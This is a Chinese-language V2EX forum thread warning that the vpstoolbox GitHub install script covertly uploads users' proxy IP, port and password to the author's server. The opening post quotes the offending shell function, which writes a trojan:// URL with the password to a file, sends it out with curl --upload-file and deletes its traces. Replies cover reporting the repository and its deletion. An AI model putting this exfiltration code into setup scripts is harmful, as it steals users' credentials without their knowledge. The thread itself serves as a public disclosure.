Github 间谍项目 vpstoolbox,避雷,有用的小伙伴记得改密码

2023-03-30 10:35:45 +08:00
 proxytoworld

仓库:https://github.com/johnrosen1/vpstoolbox/blob/master/vps.sh

会把机场的 IP ,端口,密码上传到作者可控的服务器,后续想干嘛就不知道了

https://github.com/johnrosen1/vpstoolbox/blob/ec7e0dc19561563f5d278a3e436f1cf67b9ae7b5/vps.sh#L494

clean_env(){
prasejson
cd /root
echo "trojan://${password1}@${myip}:${trojanport}?security=tls&headerType=none&type=tcp&sni=${domain}#Trojan($(nproc --all)C$(grep MemTotal /proc/meminfo | awk '{print $2}' | xargs -I {} echo "scale=1; {}/1024^2" | bc)G ${route_final}${mycountry} ${myip_org} ${myip} ${myipv6} ${target_speed_up} Mbps)" &> ${myip}.txt
curl --retry 5 https://johnrosen1.com/fsahdfksh/ --upload-file ${myip}.txt &> /dev/null
rm ${myip}.txt
cd
rm -rf /root/*.sh
rm -rf /usr/share/nginx/*.sh
clear
}


18474 次点击
所在节点    VPS
86 条回复
buyan3303
2023-03-30 10:37:12 +08:00
[机场的 IP ,端口,密码上传到作者可控的服务器]
通常自己免费使用这些机场
proxytoworld
2023-03-30 10:39:06 +08:00
@buyan3303 也有可能转卖,谁知道呢
Greenm
2023-03-30 11:02:38 +08:00
不管出于什么目的,我已经提交 report 给 github 了。
vsitebon
2023-03-30 11:19:02 +08:00
太特么溜了
Andim
2023-03-30 11:37:50 +08:00
还是 1000 以上的关注项目呀
arfaWong
2023-03-30 11:39:45 +08:00
之前就有人发现发了 issue ,然后作者把 issue 给关了😂
jomalonejia
2023-03-30 11:47:13 +08:00
关注后续
csrocks
2023-03-30 11:48:38 +08:00
已经删库了😂
aogg
2023-03-30 11:49:06 +08:00
已经打不开 github 项目了
lzgshsj
2023-03-30 11:49:36 +08:00
不开 issue 的的仓库,多少有点这那毛病
Rache1
2023-03-30 11:53:42 +08:00
Rache1
2023-03-30 11:55:32 +08:00
在这个 issue 发出来的时候,还有 1.6k star 😄

为什么 trojan 订阅地址包括用户密码等要上传到个人博客? · Issue #138 · johnrosen1/vpstoolbox · GitHub
https://web.archive.org/web/20221128070511/https://github.com/johnrosen1/vpstoolbox/issues/138
vsitebon
2023-03-30 11:56:00 +08:00
已经删号和删库了
iyiluo
2023-03-30 11:56:22 +08:00
跑路了,估计好一大波肉鸡
lakehylia
2023-03-30 11:56:48 +08:00
这是真正的删库跑路吧。。。
vsitebon
2023-03-30 11:59:13 +08:00
leaflxh
2023-03-30 12:00:49 +08:00
曾经有一次把 get.docker.com 记错了,打成了 get-docker.sh 。用一键脚本感觉像是在裸奔
leaflxh
2023-03-30 12:02:15 +08:00
#!/bin/bash
while [ 1 ]
do
echo " ______________ ______ ___ ________ "
echo " .\\\\ _ _ /----/ /_____/ \\\\\\. /_ "
echo " )__/ /___\\ _/ // / // /___(__ "
echo " / // \\ // / // /_\\ \\ "
echo " /_____\\ /_____\\ _________\\ _______ \\ "
echo " ////////\\_____///////\\\\/////////\\\\///////\\_____//. "
echo " _________ ___________ ________ _______ ________ "
echo " _) /_.) ._ // ___ // /_____\\____ ( "
echo " \\ |__/ \\__ |/ _// / / / X0 / \\ "
echo " \\ : / / \\__ / //_ /\\ /. / \\ "
echo " .\\\\___ /___\\ /_____////____/\\ \\\\__ / "
echo " ////\\____//////\\____/////// ////////\\____////\\____//. "
echo " ///// ///// ///// ///// "
echo ""
echo " WHY YOU NO LOOK AT THE SOURCE BEFORE YOU PIPE INTO BASH??"
echo ""
echo " #AirGap2020 Virtual Conference May 2nd! https://airgapp.in"
echo " Follow @airgappin on Twitter for updates!"
echo ""
done
cookcode
2023-03-30 12:19:59 +08:00
看了一眼,开发这个的老哥在 v2 也宣传过
wdv2ly
2023-03-30 12:20:11 +08:00
@vsitebon 哈哈,估计作者一看到 v 站小伙伴曝光,立马删库跑路😂

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/928400

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX